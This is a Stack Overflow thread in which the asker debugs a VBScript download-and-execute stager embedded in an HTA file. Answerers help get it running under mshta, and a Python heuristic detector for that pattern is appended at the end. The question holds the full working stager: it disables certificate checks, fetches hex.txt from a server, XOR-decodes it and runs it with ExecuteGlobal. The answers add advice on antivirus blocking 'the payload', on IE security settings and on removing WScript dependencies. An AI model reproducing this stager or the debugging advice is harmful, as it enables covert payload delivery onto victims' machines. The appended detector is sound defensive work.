1

I have a VBScript which works fine when executed standalone, i.e.

On Error Resume Next:
            Set a=CreateObject("MSXML2.ServerXMLHTTP.6.0"):
            a.setOption 2,13056:
            while(Len(b) = 0):
                a.open"GET","http://127.0.0.1/hex.txt",False:
                a.send: 
                b = a.responseText:
            wend:
            k="password":
            for i = 0 to Len(b) - 1 Step 2:
                c = c & Chr(Asc(Chr("&H" & Mid(b, i + 1, 2))) xor Asc(Mid(k, ((i / 2)mod Len(k)) + 1, 1))):
        
            Next:
            ExecuteGlobal c: 

But when I include this script inside an HTA, it doesn't execute the (ExecuteGlobal c:), i.e.

<html>
<head>
<script language="VBScript"> 
    Sub RunProgram
            On Error Resume Next:
            Set a=CreateObject("MSXML2.ServerXMLHTTP.6.0"):
            a.setOption 2,13056:
            while(Len(b) = 0):
                a.open"GET","http://127.0.0.1/hex.txt",False:
                a.send: 
                b = a.responseText:
            wend:
            k="password":
            for i = 0 to Len(b) - 1 Step 2:
                c = c & Chr(Asc(Chr("&H" & Mid(b, i + 1, 2))) xor Asc(Mid(k, ((i / 2)mod Len(k)) + 1, 1))):
        
            Next:
            ExecuteGlobal c:   
        End Sub
    RunProgram()
</script>
</head> 
<body>
 
</body>
</html>

I think the issue is with the (ExecuteGlobal c:) portion; it doesn't execute in the HTA, but it executes fine when I use the VBScript alone.

user260854
  • 27
  • 5
  • Because that isn't a HTA so the won’t allow to use code like `ExecuteGlobal`. You need to include the [`<HTA:APPLICATION>`](https://learn.microsoft.com/en-us/previous-versions/ms536495(v=vs.85)) element. – user692942 Jul 13 '21 at 06:17
  • 1
    why do you end each line with a `:` ? Seems weird to me. – Geert Bellekens Jul 13 '21 at 13:26

1 Answer

0

Updated Answer:

Based on the comments it is clear that the issue is in the decoded script you try to run making a reference to WScript, which is an object not accessible outside of the Windows Scripting Host (wscript.exe and cscript.exe). It is not available from within an HTA as the MSHTA scripting host doesn't support it.


Original Answer:

The HTML code example at the moment is not an HTA as it is missing the <HTA:APPLICATION> element.

Try adding;

<HTA:APPLICATION ID="oHTA"
     APPLICATIONNAME="myApp"
     BORDER="thin"
     BORDERSTYLE="normal"
     CAPTION="yes"
     ICON=""
     MAXIMIZEBUTTON="yes"
     MINIMIZEBUTTON="yes"
     SHOWINTASKBAR="no"
     SINGLEINSTANCE="no"
     SYSMENU="yes"
     VERSION="1.0"
     WINDOWSTATE="maximize"/>

to the HTML inside the HEAD element.


user692942
  • 16,398
  • 7
  • 76
  • 175
  • Thanks for the reply, I have added the above lines but it didn't work. I think the HTA doesn't properly run (ExecuteGlobal c: ) because when I use the VBScript alone, it works fine but in the HTA it doesn't – user260854 Jul 13 '21 at 06:41
  • @user260854 How are you running your HTA? It should be via `mshta.exe` and the file should have a `.hta` extension anything else like just opening it locally in the web browser will not work. I’ve added a link to the official documentation to get you started. – user692942 Jul 13 '21 at 06:52
  • I'm executing using mshta and it executes fine because I can see on my host system that hex.txt is fetched successfully, but (ExecuteGlobal c) doesn't execute – user260854 Jul 13 '21 at 07:16
  • @user260854 are you running some AV software that could be reading the script as a false positive (assuming the script isn't malicious)? If you are using the script in the context of an HTA there is no reason why `ExecuteGlobal` shouldn't work, I've used it myself many times but have also encountered issues with 3rd party AV and MW programs blocking it from running. – user692942 Jul 13 '21 at 07:33
  • @user260854 Also, how do you know `ExecuteGlobal` doesn't execute? I would start by trying a simpler piece of code in `c` to test it like `c = "MsgBox ""test"""` and see if that executes, you should have a popup message with the word `test` appear. – user692942 Jul 13 '21 at 07:40
  • I'm running an HTTP server on my server side, so when the hex file is fetched, I get notified on the server. But in ExecuteGlobal() I'm also fetching some files, but the server didn't show notifications related to those files, therefore I thought that ExecuteGlobal() doesn't execute (properly, I suppose) – user260854 Jul 13 '21 at 07:48
  • @user260854 in which case, I would try a simpler test to check `ExecuteGlobal` is not executing as I [suggested in the previous comment](https://stackoverflow.com/questions/68356597/usage-of-executeglobal-in-hta-file#comment120812153_68357452). It's more likely the overly complex hex decode is what is not doing what you expect. – user692942 Jul 13 '21 at 07:55
  • 1
    You are right, as I've tried a simple MsgBox and it executed successfully. The confusion lies in the fact that the same decoding mechanism works fine when executed standalone as a VBS script. I have executed this same VBS portion several times and it works fine without the HTA, but when executed as a part of the HTA, it creates a problem. – user260854 Jul 13 '21 at 09:47
  • @user260854 in which case it's not `ExecuteGlobal` that is the problem but likely some 3rd party app is flagging the payload you are trying to execute as malicious and blocking its execution. – user692942 Jul 13 '21 at 09:51
  • 1
    @user260854 You could comment out the `On Error Resume Next` temporarily and see if the code is throwing any errors. – Flakes Jul 13 '21 at 11:00
  • Also, you might need to play with the `iexplore.exe` security settings in the Internet Options dialogue as this is what MSHTA uses when restricting access to ActiveX controls etc. – user692942 Jul 13 '21 at 11:03
  • 1
    @Flakes: I had commented out (On Error Resume Next) and got this error: "Object required: 'Wscript'" – user260854 Jul 13 '21 at 11:26
  • 1
    @user260854 The `hex.txt` decode contains a script that uses `WScript` but that object [isn't native to VBScript](https://stackoverflow.com/a/40484681/692942) it's part of the scripting host used by VBScript. That explains why it works when you run VBScript via the `cscript/wscript` scripting host. – user692942 Jul 13 '21 at 12:21
  • Yes, that's right. I'm using WScript in the following, so I would need their alternatives for HTA. 1) Wscript.Stdout 2) WScript.CreateObject( ) 3) WScript.Sleep – user260854 Jul 13 '21 at 12:34
  • @user260854 well `CreateObject()` is built into VBScript anyway so just drop the `WScript.`. As for `Sleep` this is covered with [another answer](https://stackoverflow.com/a/13099520/692942). The weird one is `StdOut` because it's part of the `WScript.Shell` by calling the `Exec()` method, so that should be fine only references directly to `WScript` will cause issues. – user692942 Jul 13 '21 at 13:18
  • 1
    Thank you, I think I have to create another thread for solving the Wscript.Stdout issue. – user260854 Jul 14 '21 at 04:09
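
The script in the question has a recognisable shape: an HTTP fetch with certificate checks disabled, a hex/XOR decode, and `ExecuteGlobal` on the result, all under `On Error Resume Next`. As an added example (not code from the question or the answer), the Python below triages an `.hta` or `.vbs` file for those indicators; the rule names and the `triage` helper are this example's own, and the sample is constructed from the question's script.

```python
import re

# Constructed sample: the HTA from the question, with the retry loop removed.
SAMPLE_HTA = '''<html><head><script language="VBScript">
Sub RunProgram
    On Error Resume Next:
    Set a=CreateObject("MSXML2.ServerXMLHTTP.6.0"):
    a.setOption 2,13056:
    a.open"GET","http://127.0.0.1/hex.txt",False:
    a.send:
    b = a.responseText:
    k="password":
    for i = 0 to Len(b) - 1 Step 2:
        c = c & Chr(Asc(Chr("&H" & Mid(b, i + 1, 2))) xor Asc(Mid(k, ((i / 2)mod Len(k)) + 1, 1))):
    Next:
    ExecuteGlobal c:
End Sub
RunProgram()
</script></head><body></body></html>'''

# Heuristic indicators (names are this example's own); VBScript is case-insensitive.
RULES = {
    "http_client":   r'CreateObject\s*\(\s*"(?:MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest)',
    # ServerXMLHTTP option 2 with value 13056 ignores all server certificate errors
    "tls_check_off": r'\.setOption\s*\(?\s*2\s*,\s*13056',
    "xor_decode":    r'\bChr\w?\s*\(.*\bxor\b',
    "dynamic_exec":  r'(?<![.\w])(?:ExecuteGlobal|Execute|Eval)\b',
    "errors_hidden": r'On\s+Error\s+Resume\s+Next',
}

def script_blocks(text):
    """Bodies of <script> elements; a bare .vbs file counts as one block."""
    found = re.findall(r'<script\b[^>]*>(.*?)</script\s*>', text, re.I | re.S)
    return found or [text]

def strip_comments(code):
    """Drop ' comments but keep apostrophes that sit inside string literals."""
    return re.sub(r'("(?:[^"\n]|"")*")|\'[^\n]*', lambda m: m.group(1) or "", code)

def triage(text):
    """Return indicator -> bool, plus 'stager_chain' when fetch and dynamic exec co-occur."""
    code = "\n".join(strip_comments(b) for b in script_blocks(text))
    hits = {name: bool(re.search(rx, code, re.I)) for name, rx in RULES.items()}
    hits["stager_chain"] = hits["http_client"] and hits["dynamic_exec"]
    return hits

if __name__ == "__main__":
    for name, hit in triage(SAMPLE_HTA).items():
        print(f"{name:14} {hit}")
```

These are static heuristics: a hit on `stager_chain` means the file deserves a closer look, not that it is malicious, and legitimate admin scripts can trip individual rules.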